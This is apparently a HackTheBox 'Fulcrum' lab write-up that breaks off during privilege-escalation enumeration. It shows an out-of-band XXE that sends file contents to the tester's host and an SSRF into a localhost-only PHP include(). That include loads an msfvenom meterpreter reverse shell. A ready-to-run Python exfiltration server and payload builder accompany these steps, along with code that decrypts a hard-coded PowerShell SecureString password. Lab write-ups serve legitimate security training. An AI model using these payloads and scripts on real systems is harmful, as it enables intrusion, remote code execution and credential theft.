HackTheBox-Fulcrum


---
title: HackTheBox-Fulcrum
author: CrazyInSide
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/Fulcrum (1).png
tags:
  - Linux
---


Recon:

```
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.62
[sudo] password for crazyinside:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-03 00:25:25 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 9999/tcp on 10.10.10.62
Discovered open port 4/tcp on 10.10.10.62
Discovered open port 56423/tcp on 10.10.10.62
Discovered open port 80/tcp on 10.10.10.62
Discovered open port 22/tcp on 10.10.10.62
Discovered open port 88/tcp on 10.10.10.62
```
```
CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.62 -p4,22,80,88,9999,56423
[sudo] password for crazyinside:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-03 08:28 CST
Nmap scan report for 10.10.10.62
Host is up (0.30s latency).

PORT      STATE SERVICE VERSION
4/tcp     open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: 502 Bad Gateway
88/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: phpMyAdmin
| http-robots.txt: 1 disallowed entry
|_/
9999/tcp  open  http    nginx 1.18.0 (Ubuntu)
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.18.0 (Ubuntu)
56423/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
|_http-server-header: Fulcrum-API Beta
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.37 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.62 -p4,22,80,88,9999,56423
```

Port 4:

Clicking the link on the page leads to a URL that looks like a file include:

```
CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62:4/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-4/-_22-09-03_08-32-57.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-32-57.log

Target: http://10.10.10.62:4/

[08:32:58] Starting:
[08:34:21] 200 -  312B - /home.php
[08:34:24] 200 -  110B - /index.php
[08:35:08] 200 -   54B - /upload.php

Task Completed
CrazyInSide:~/HackTheBox$
```

Whatever I upload, the upload fails. I also spent a while fuzzing the suspected file-include parameter, with nothing to show for it:

```
CrazyInSide:~/HackTheBox$ wfuzz -w /usr/share/wordlists/dirb/big.txt -u 'http://10.10.10.62:4/index.php?page=FUZZ' --hh 110
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.62:4/index.php?page=FUZZ
Total requests: 20469

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

^C
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 12902
Filtered Requests: 12902
Requests/sec.: 0

CrazyInSide:~/HackTheBox$
```

Port 80: the target is a Linux box, yet the page shows a Windows .NET error, so nginx is most likely reverse-proxying a service on an internal Windows host.

Nothing to find here, though:

```
CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62 -e asp,aspx

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: asp, aspx | HTTP method: GET | Threads: 30 | Wordlist size: 9511

Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62/_22-09-03_08-39-56.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-39-56.log

Target: http://10.10.10.62/

[08:39:57] Starting:
[08:40:38] 403 -  312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:41:37] 200 -    5KB - /index.htm

Task Completed
CrazyInSide:~/HackTheBox$
```

Port 88 is a phpMyAdmin:

I tried root:root and did not get in. Parked for later. Port 9999 looks the same as port 80:

```
CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62:9999/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-9999/-_22-09-03_08-48-51.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-48-51.log

Target: http://10.10.10.62:9999/

[08:48:51] Starting:
[08:49:31] 403 -  312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[08:50:46] 200 -    5KB - /index.htm

Task Completed
```

Port 56423 serves JSON:

```
CrazyInSide:~/HackTheBox$ curl -I http://10.10.10.62:56423/
HTTP/1.1 200 OK
Date: Sat, 03 Sep 2022 00:54:17 GMT
Content-Type: application/json;charset=utf-8
Connection: keep-alive
Server: Fulcrum-API Beta

CrazyInSide:~/HackTheBox$ curl http://10.10.10.62:56423/
{"Heartbeat":{"Ping":"Pong"}}
CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423/
{"Heartbeat":{"Ping":"Pong"}}
CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d {"Heartbeat":{"Ping":"ping"}}
{"Heartbeat":{"Ping":"Pong"}}
CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d '{"Heartbeat":{"Ping":"ping"}}'
{"Heartbeat":{"Ping":"Pong"}}

CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d '{"Heartbeat":{"Ping":"ping"}}' -H 'Content-Type: application/json'
{"Heartbeat":{"Ping":"Pong"}}
```

None of that changed the response. Searching around, the hint was that an API like this may accept JSON, plain HTTP form parameters, or even XML, so try each content type in turn.

```
CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d 'Heartbeat[Ping]=Pong'
{"Heartbeat":{"Ping":"Pong"}}
CrazyInSide:~/HackTheBox$ curl http://10.10.10.62:56423 -d 'Heartbeat[Ping]=Pong'
{"Heartbeat":{"Ping":"Pong"}}
```

Form parameters did nothing either. Then I tried XML:

```
CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d '<Heartbeat><Ping>Ping</Ping></Heartbeat>'
{"Heartbeat":{"Ping":"Ping"}}
```

It changed: the XML body was parsed and its value echoed back, which makes this a candidate for XXE.

An in-band read did not work, though. The response only ever shows the Heartbeat/Ping structure and never the file contents, so the contents have to leave through a side channel: an external DTD hosted on my machine that wraps the file into an entity whose URL points back at me.

```
CrazyInSide:~/HackTheBox$ cat payload.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://10.10.16.3/?%file;'>">
%all;
CrazyInSide:~/HackTheBox$
```

Then build the request in Burp. The DOCTYPE that declares the %file; parameter entity (a php://filter base64 read) and pulls in payload.dtd did not survive on this page; only the prolog and the &send; reference remain:

```
POST / HTTP/1.1
Host: 10.10.10.62:56423
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 115

<?xml version="1.0" encoding="utf-8"?>
[DOCTYPE with the %file; and %dtd; declarations not recoverable from this page]
&send;
```

The listener on 10.10.16.3 receives the base64-encoded file in the query string:

```
10.10.10.62 - - [03/Sep/2022 09:32:22] "GET /?[base64 elided] HTTP/1.0" 200 -
```

```
CrazyInSide:~/HackTheBox$ echo "[base64 from the log line]" | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
libvirt-qemu:x:64055:108:Libvirt Qemu,,,:/var/lib/libvirt:/usr/sbin/nologin
libvirt-dnsmasq:x:114:120:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/usr/sbin/nologin
```

None of these are ordinary login users (no home directories under /home with a real shell), so the next step is guessing web-root paths. After a lot of tries, the port 4 site turned out to live in a directory called uploads:

```
CrazyInSide:~/HackTheBox$ cat payload.dtd
<!ENTITY % all "<!ENTITY send SYSTEM 'http://10.10.16.3/?%file;'>">
%all;
CrazyInSide:~/HackTheBox$
```

```
10.10.10.62 - - [03/Sep/2022 09:49:07] "GET /payload.dtd HTTP/1.0" 200 -
10.10.10.62 - - [03/Sep/2022 09:49:07] "GET /?PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK HTTP/1.0" 200 -
```

```
CrazyInSide:~/HackTheBox$ echo "PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK" | base64 -d
```

```php
<?php
if($_SERVER['REMOTE_ADDR'] != "127.0.0.1")
{
	echo "<h1>Under Maintance</h1><p>Please <a href=\"http://" . $_SERVER['SERVER_ADDR'] . ":4/index.php?page=home\">try again</a> later.</p>";
}else{
	$inc = $_REQUEST["page"];
	include($inc.".php");
}
?>
```

The include only runs when the request comes from 127.0.0.1, and page is passed to include() with ".php" appended and no other filtering. The XXE gives us exactly that vantage point: an external entity is fetched by the API's own XML parser, so a request to http://127.0.0.1:4/index.php arrives from localhost. Setting page=http://10.10.16.3/shell makes include() pull shell.php from my host and execute it. Generate the payload, then send it through the same XXE request with the entity pointed at index.php:

```
CrazyInSide:~/HackTheBox$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
```

```
POST / HTTP/1.1
Host: 10.10.10.62:56423
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 143

<?xml version="1.0" encoding="utf-8"?>
[DOCTYPE declaring the send entity not recoverable from this page]
&send;
```

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Sending stage (39927 bytes) to 10.10.10.62
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.62:60246) at 2022-09-03 09:51:52 +0800

meterpreter >
```
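The attacker side of both XXE steps above (the out-of-band file read and the localhost SSRF into index.php), as an added Python example. This is my code, not the author's: it builds the request bodies, serves the same payload.dtd shown above, and decodes the base64 that lands in the listener's query string. The listener address 10.10.16.3 and the /payload.dtd path come from the log lines on this page; the exact request bodies the author sent are not on the page, so the bodies below are my reconstruction of what those log lines imply.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Assumed: the attacker host the target can reach (the page's LHOST), which
# also serves payload.dtd; both appear in the listener log lines above.
ATTACKER = "http://10.10.16.3"
DTD_URL = ATTACKER + "/payload.dtd"


def make_dtd(callback_base: str) -> str:
    """External DTD served as payload.dtd.

    By the time this DTD is parsed, %file; has been declared in the request's
    internal subset, so it can be spliced into a new general entity whose
    SYSTEM URL points back at us. A parameter-entity reference inside an
    entity value is only allowed in an external DTD, which is why the file
    cannot be exfiltrated from the internal subset alone.
    """
    return (f"<!ENTITY % all \"<!ENTITY send SYSTEM '{callback_base}/?%file;'>\">\n"
            "%all;\n")


def make_file_read_body(dtd_url: str, path: str) -> str:
    """XML body that reads `path` via php://filter (base64 keeps newlines and
    XML-hostile bytes out of the callback URL) and triggers the send."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            "<!DOCTYPE data [\n"
            f'<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource={path}">\n'
            f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
            "%dtd;\n"
            "]>\n"
            "<Heartbeat><Ping>&send;</Ping></Heartbeat>\n")


def make_ssrf_body(url: str) -> str:
    """XML body whose entity makes the target's parser fetch `url` itself.

    index.php then sees REMOTE_ADDR 127.0.0.1 and takes the include() branch.
    The reverse shell fires inside that include, before the parser ever looks
    at the response, so the fetched content does not need to be valid XML.
    """
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            "<!DOCTYPE data [\n"
            f'<!ENTITY send SYSTEM "{url}">\n'
            "]>\n"
            "<Heartbeat><Ping>&send;</Ping></Heartbeat>\n")


def decode_callback(request_line: str) -> str:
    """Turn the listener's 'GET /?<base64> HTTP/1.0' line back into the file."""
    target = request_line.split(" ", 2)[1]          # "/?<base64>"
    # urlsplit().query is the raw string: parse_qs would mangle '+' and '='.
    return base64.b64decode(urlsplit(target).query).decode("utf-8", "replace")


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves payload.dtd and prints whatever the target sends back."""

    def do_GET(self):
        if self.path == "/payload.dtd":
            body = make_dtd(ATTACKER).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.end_headers()
            self.wfile.write(body)
            return
        if self.path.startswith("/?"):
            print(decode_callback(self.requestline))
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    # Port 80 needs root. Start this, then POST the printed body to the API;
    # for the second step POST make_ssrf_body(...) instead.
    print(make_file_read_body(DTD_URL, "/var/www/uploads/index.php"))
    print(make_ssrf_body("http://127.0.0.1:4/index.php?page=" + ATTACKER + "/shell"))
    HTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()
```

The file travels inside a URL, so very large files will be cut off by whatever URL length the target's HTTP client tolerates; read small files such as configs and source, not logs.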

Initial access:

For a Linux box, the upload directory holds a surprising file: a PowerShell script.

```
meterpreter > ls
Listing: /var/www/uploads
=========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  714   fil   2017-10-05 06:01:00 +0800  Fulcrum_Upload_to_Corp.ps1
100644/rw-r--r--  321   fil   2017-10-05 03:57:06 +0800  home.php
100644/rw-r--r--  255   fil   2017-10-06 03:08:22 +0800  index.php
100644/rw-r--r--  113   fil   2017-10-05 03:54:48 +0800  upload.php

meterpreter > download Fulcrum_Upload_to_Corp.ps1
[*] Downloading: Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1
[*] Downloaded 714.00 B of 714.00 B (100.0%): Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1
[*] download   : Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1
meterpreter >
```

```powershell
# TODO: Forward the PowerShell remoting port to the external interface
# Password is now encrypted \o/

$1 = 'WebUser'
$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='
$4 = $3 | ConvertTo-SecureString -key $2
$5 = New-Object System.Management.Automation.PSCredential ($1, $4)
Invoke-Command -Computer upload.fulcrum.local -Credential $5 -File Data.ps1
```
The "encryption" is only as strong as the key, and the key is the byte array sitting in the same script, so the same five lines recover the credential on any machine with PowerShell:

```
┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $1 = 'WebUser'

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA='

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $4 = $3 | ConvertTo-SecureString -key $2

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $5 = New-Object System.Management.Automation.PSCredential ($1, $4)

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $5

UserName                     Password
--------                     --------
WebUser  System.Security.SecureString

┌──(crazyinside@ParrotOS)-[/home/crazyinside]
└─PS> $5.GetNetworkCredential() | Format-List *

UserName       : WebUser
Password       : M4ng£m£ntPa55
SecurePassword : System.Security.SecureString
Domain         :
```

A PSCredential object hands the plaintext back through GetNetworkCredential(); a SecureString protected with a hard-coded -Key is obfuscation, not a secret. The credential presumably belongs to a Windows host on the internal network, and my current foothold is the Linux box, so the next step is to enumerate its network:
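The same recovery without a Windows host, as an added Python example (mine, not the author's or the script's). The container that ConvertFrom-SecureString -Key writes is a fixed 32-hex-character header followed by base64 of the UTF-16LE string 2|<base64 IV>|<hex ciphertext>; the ciphertext is AES-CBC over the UTF-16LE password with PKCS#7 padding, keyed by the byte array from the script (32 bytes here, so AES-256). Parsing uses only the standard library; the decryption step uses the third-party cryptography package and returns None when it is not installed.

```python
import base64
from dataclasses import dataclass

# Fixed header that ConvertFrom-SecureString -Key prepends to every blob.
MAGIC = "76492d1116743f0423413b16050a5345"

# Both values copied from Fulcrum_Upload_to_Corp.ps1 as shown above.
KEY_CSV = "77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48"
BLOB = "76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA="


@dataclass
class SecureStringBlob:
    version: str
    iv: bytes
    ciphertext: bytes


def key_from_powershell(csv: str) -> bytes:
    """'77,52,...' -split ',' is coerced to byte[] by -Key; AES wants 16/24/32 bytes."""
    key = bytes(int(v) for v in csv.split(","))
    if len(key) not in (16, 24, 32):
        raise ValueError(f"unsupported key length {len(key)}")
    return key


def parse_blob(blob: str) -> SecureStringBlob:
    """Split the container into version, IV and raw AES-CBC ciphertext."""
    if not blob.startswith(MAGIC):
        raise ValueError("not a ConvertFrom-SecureString -Key blob")
    inner = base64.b64decode(blob[len(MAGIC):]).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|")
    return SecureStringBlob(version, base64.b64decode(iv_b64), bytes.fromhex(ct_hex))


def decrypt_secure_string(blob: SecureStringBlob, key: bytes):
    """AES-CBC decrypt, strip PKCS#7, decode UTF-16LE. None if `cryptography` is missing."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(key), modes.CBC(blob.iv)).decryptor()
    padded = dec.update(blob.ciphertext) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted blob")
    return padded[:-pad].decode("utf-16-le")


def recover(blob: str = BLOB, key_csv: str = KEY_CSV):
    """Convenience wrapper: password string, or None without `cryptography`."""
    return decrypt_secure_string(parse_blob(blob), key_from_powershell(key_csv))


if __name__ == "__main__":
    b = parse_blob(BLOB)
    print("version:", b.version)
    print("iv:", b.iv.hex())
    print("ciphertext:", b.ciphertext.hex(), f"({len(b.ciphertext)} bytes)")
    print("password:", recover() or "(install `cryptography` to decrypt)")
```

Two blocks of ciphertext for a 13-character password is consistent with the UTF-16LE plaintext (26 bytes) padded to 32. Note that the key bytes read "M4ng?m?ntPa55": the key was derived from the password with the £ characters lost to an ASCII conversion, while the encrypted plaintext still carries them.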

```
meterpreter > shell
Process 5035 created.
Channel 1 created.
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.62  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:21a8  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:21a8  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:21:a8  txqueuelen 1000  (Ethernet)
        RX packets 319079  bytes 31518824 (31.5 MB)
        RX errors 0  dropped 71  overruns 0  frame 0
        TX packets 158545  bytes 50733938 (50.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 119145  bytes 24175896 (24.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 119145  bytes 24175896 (24.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

virbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255
        ether 52:54:00:97:17:b7  txqueuelen 1000  (Ethernet)
        RX packets 64680  bytes 29586894 (29.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 95842  bytes 10911830 (10.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::fc54:ff:fe9e:52f2  prefixlen 64  scopeid 0x20<link>
        ether fe:54:00:9e:52:f2  txqueuelen 1000  (Ethernet)
        RX packets 1330  bytes 166128 (166.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5135  bytes 382282 (382.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vnet1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::fc54:ff:fe9e:52f3  prefixlen 64  scopeid 0x20<link>
        ether fe:54:00:9e:52:f3  txqueuelen 1000  (Ethernet)
        RX packets 1082  bytes 164154 (164.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4735  bytes 333045 (333.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

vnet2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::fc54:ff:fe9e:52f4  prefixlen 64  scopeid 0x20<link>
        ether fe:54:00:9e:52:f4  txqueuelen 1000  (Ethernet)
        RX packets 63872  bytes 30420506 (30.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 99788  bytes 11125703 (11.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens160
10.10.10.0      0.0.0.0         255.255.255.0   U     0      0        0 ens160
192.168.122.0   0.0.0.0         255.255.255.0   U     0      0        0 virbr0
script /bin/bash /dev/null -qc
script: option requires an argument -- 'c'
Try 'script --help' for more information.
script -qc /bin/bash /dev/null
www-data@fulcrum:~/uploads$ ls
ls
Fulcrum_Upload_to_Corp.ps1  home.php  index.php  upload.php
www-data@fulcrum:~/uploads$
```

There is a second network, 192.168.122.0/24, behind virbr0 (the libvirt bridge; the vnet interfaces are the VMs' tap devices), so this box is the hypervisor for the internal hosts. I wanted to forward into it with iptables directly, which needs root, so privilege escalation comes first:

```
www-data@fulcrum:/tmp$ uname -a
uname -a
Linux fulcrum 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
www-data@fulcrum:/tmp$ iptables -a
iptables -a
iptables v1.8.4 (legacy): unknown option "-a"
Try `iptables -h' or 'iptables --help' for more information.
www-data@fulcrum:/tmp$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/snapd/15534/usr/lib/snapd/snap-confine
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
